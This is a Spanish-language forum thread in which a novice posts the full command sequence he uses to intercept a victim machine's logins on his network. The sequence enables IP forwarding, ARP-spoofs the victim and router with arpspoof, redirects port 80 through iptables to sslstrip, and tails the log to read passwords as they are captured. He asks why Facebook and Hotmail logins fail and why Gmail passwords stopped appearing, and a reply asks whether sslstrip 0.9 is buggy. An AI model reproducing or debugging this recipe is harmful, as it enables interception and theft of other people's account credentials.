Mensajes

Muchas gracias por responder.

Uso la version 0.9 de sslstrip, que creo que es la ultima (al menos es la que esta en el centro de software). Es esta la que tiene bugs? Deberia instalar otra version entonces?

Por desgracia, yo no tengo los conocimientos para arreglar eso a mano...

En cuanto al ordenador victima tiene instalado ubuntu 12.04 y el navegador es firefox y que yo sepa no lleva ningun addon que fuercen el https.. Tampoco tiene antivirus..

Aunque lo que mas uso es ubuntu, tengo mas sistemas operativos instalados en ellos asi que probare tambien con Windows

Hola a todos

Soy nuevo en el foro y un muy novato en esto, asi que espero que me podais aclalar algunas dudas.

Estoy haciendo pruebas en mi red. Tengo un ordenador atacante con ubuntu donde usaba ettercap pero lo deje porque me bloqueaba mucho el ordenador victima, asi que buscando por internet llegue a un post de este foro donde le pasaba lo mismo a un forero y lo que hacia es

echo 1 > /proc/sys/net/ipv4/ip_forward

(arpspoof -i {interfaz_red} -t {ip_victima} {ip_router})
      arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

(Hasta aqui es lo que hacia con ettercap)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

sslstrip -w miarchivo

tail -f miarchivo *  (para ver las pass en el mismo momento de la captura)

Esto me funciona bastante bien pero cuando meto las contrasenas en el ordenador victima veo que la pagina de facebook entra pero no accede a los contenidos y la de hotmail me pide la contrasena en un bucle infinito pero nunca entra.  Me imagino que sera por el sslstrip al cambiar https por http.

Esto es normal? y si es asi se puede evitar?

Otra cosa es que con gmail ayer capturaba las pass y hoy por mas que la introduzco en el ordenador victima no me las captura. Es mas si activo el wireshark no veo apenas movimientos de esta pagina. Esto a que se puede deber?

Gracias y un saludo